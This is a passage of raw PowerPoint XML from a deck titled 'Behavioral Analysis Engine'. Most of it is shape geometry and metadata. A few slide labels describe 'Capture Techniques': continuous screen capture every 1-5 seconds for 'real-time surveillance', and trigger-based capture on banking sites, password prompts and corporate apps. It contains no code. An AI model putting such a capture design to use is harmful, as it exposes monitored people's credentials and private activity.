                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="138685" y="160421"/>
                  <a:pt x="148962" y="150144"/>
                  <a:pt x="148962" y="137504"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="148962" y="45835"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="148962" y="33194"/>
                  <a:pt x="138685" y="22917"/>
                  <a:pt x="126045" y="22917"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="34376" y="22917"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="166150" y="120316"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="192469" y="141371"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="193973" y="142589"/>
                  <a:pt x="195835" y="143233"/>
                  <a:pt x="197769" y="143233"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="202460" y="143233"/>
                  <a:pt x="206256" y="139437"/>
                  <a:pt x="206256" y="134747"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="206256" y="48592"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="206256" y="43901"/>
                  <a:pt x="202460" y="40105"/>
                  <a:pt x="197769" y="40105"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195835" y="40105"/>
                  <a:pt x="193973" y="40750"/>
                  <a:pt x="192469" y="41967"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="166150" y="63023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166150" y="120316"/>
                </a:ln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6" name="Text 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6580815" y="5023238"/>
            <a:ext cx="5188475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4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Capture Techniques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51643" y="5389915"/>
            <a:ext cx="5325979" cy="623350"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5325979" h="623350">
                <a:moveTo>
                  <a:pt x="36665" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5289313" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5309563" y="0"/>
                  <a:pt x="5325979" y="16416"/>
                  <a:pt x="5325979" y="36665"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5325979" y="586685"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5325979" y="606935"/>
                  <a:pt x="5309563" y="623350"/>
                  <a:pt x="5289313" y="623350"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36665" y="623350"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16416" y="623350"/>
                  <a:pt x="0" y="606935"/>
                  <a:pt x="0" y="586685"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="36665"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16429"/>
                  <a:pt x="16429" y="0"/>
                  <a:pt x="36665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8" name="Shape 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6479979" y="5628254"/>
            <a:ext cx="146671" cy="146671"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="146671" h="146671">
                <a:moveTo>
                  <a:pt x="42712" y="18563"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="39733" y="27501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18334" y="27501"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8222" y="27501"/>
                  <a:pt x="0" y="35722"/>
                  <a:pt x="0" y="45835"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="119170"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="129282"/>
                  <a:pt x="8222" y="137504"/>
                  <a:pt x="18334" y="137504"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="128337" y="137504"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="138449" y="137504"/>
                  <a:pt x="146671" y="129282"/>
                  <a:pt x="146671" y="119170"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="146671" y="45835"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="146671" y="35722"/>
                  <a:pt x="138449" y="27501"/>
                  <a:pt x="128337" y="27501"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="106938" y="27501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103959" y="18563"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="102097" y="12948"/>
                  <a:pt x="96854" y="9167"/>
                  <a:pt x="90924" y="9167"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="55746" y="9167"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="49816" y="9167"/>
                  <a:pt x="44574" y="12948"/>
                  <a:pt x="42712" y="18563"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="73335" y="55002"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="88513" y="55002"/>
                  <a:pt x="100836" y="67324"/>
                  <a:pt x="100836" y="82502"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="100836" y="97680"/>
                  <a:pt x="88513" y="110003"/>
                  <a:pt x="73335" y="110003"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58157" y="110003"/>
                  <a:pt x="45835" y="97680"/>
                  <a:pt x="45835" y="82502"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45835" y="67324"/>
                  <a:pt x="58157" y="55002"/>
                  <a:pt x="73335" y="55002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59" name="Text 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6754987" y="5499918"/>
            <a:ext cx="4885967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Continuous Capture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754987" y="5719924"/>
            <a:ext cx="4876800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1-5 second intervals for real-time surveillance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51643" y="6086600"/>
            <a:ext cx="5325979" cy="623350"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5325979" h="623350">
                <a:moveTo>
                  <a:pt x="36665" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5289313" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5309563" y="0"/>
                  <a:pt x="5325979" y="16416"/>
                  <a:pt x="5325979" y="36665"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5325979" y="586685"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5325979" y="606935"/>
                  <a:pt x="5309563" y="623350"/>
                  <a:pt x="5289313" y="623350"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36665" y="623350"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16416" y="623350"/>
                  <a:pt x="0" y="606935"/>
                  <a:pt x="0" y="586685"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="36665"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16429"/>
                  <a:pt x="16429" y="0"/>
                  <a:pt x="36665" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="1A1D21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2" name="Shape 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6489146" y="6324940"/>
            <a:ext cx="128337" cy="146671"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="128337" h="146671">
                <a:moveTo>
                  <a:pt x="22144" y="716"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="24464" y="-458"/>
                  <a:pt x="27272" y="-201"/>
                  <a:pt x="29334" y="1375"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="121003" y="70098"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="123381" y="71874"/>
                  <a:pt x="124326" y="74968"/>
                  <a:pt x="123410" y="77776"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122493" y="80583"/>
                  <a:pt x="119857" y="82474"/>
                  <a:pt x="116878" y="82474"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="73249" y="82474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98716" y="133379"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="100979" y="137905"/>
                  <a:pt x="99146" y="143405"/>
                  <a:pt x="94620" y="145668"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="90094" y="147931"/>
                  <a:pt x="84593" y="146098"/>
                  <a:pt x="82330" y="141572"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="56864" y="90667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30709" y="125558"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="28933" y="127936"/>
                  <a:pt x="25839" y="128881"/>
                  <a:pt x="23032" y="127964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20225" y="127048"/>
                  <a:pt x="18334" y="124412"/>
                  <a:pt x="18334" y="121462"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18334" y="6875"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18334" y="4268"/>
                  <a:pt x="19795" y="1891"/>
                  <a:pt x="22144" y="716"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E0A458"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Text 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6754987" y="6196603"/>
            <a:ext cx="4885967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E1E3E6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Trigger-Based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754987" y="6416609"/>
            <a:ext cx="4876800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E1E3E6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Banking sites, password prompts, corporate apps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1852</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>385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Quattrocento Sans</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Liter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BEHAVIORAL ANALYSIS ENGINE</dc:title>
  <dc:subject>BEHAVIORAL ANALYSIS ENGINE</dc:subject>
  <dc:creator>Kimi</dc:creator>
  <cp:lastModifiedBy>Chanaka Nanayakkara</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-16T14:31:57Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-16T14:32:17Z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{"Label":"BEHAVIORAL ANALYSIS ENGINE","ContentProducer":"001191110108MACG2KBH8F10000","ProduceID":"19bc7346-0ab2-82b8-8000-0000fcf44a1c","ReservedCode1":"","ContentPropagator":"001191110108MACG2KBH8F20000","PropagateID":"19bc7346-0ab2-82b8-8000-0000fcf44a1c","ReservedCode2":""}</vt:lpwstr>
  </property>
</Properties>
</file>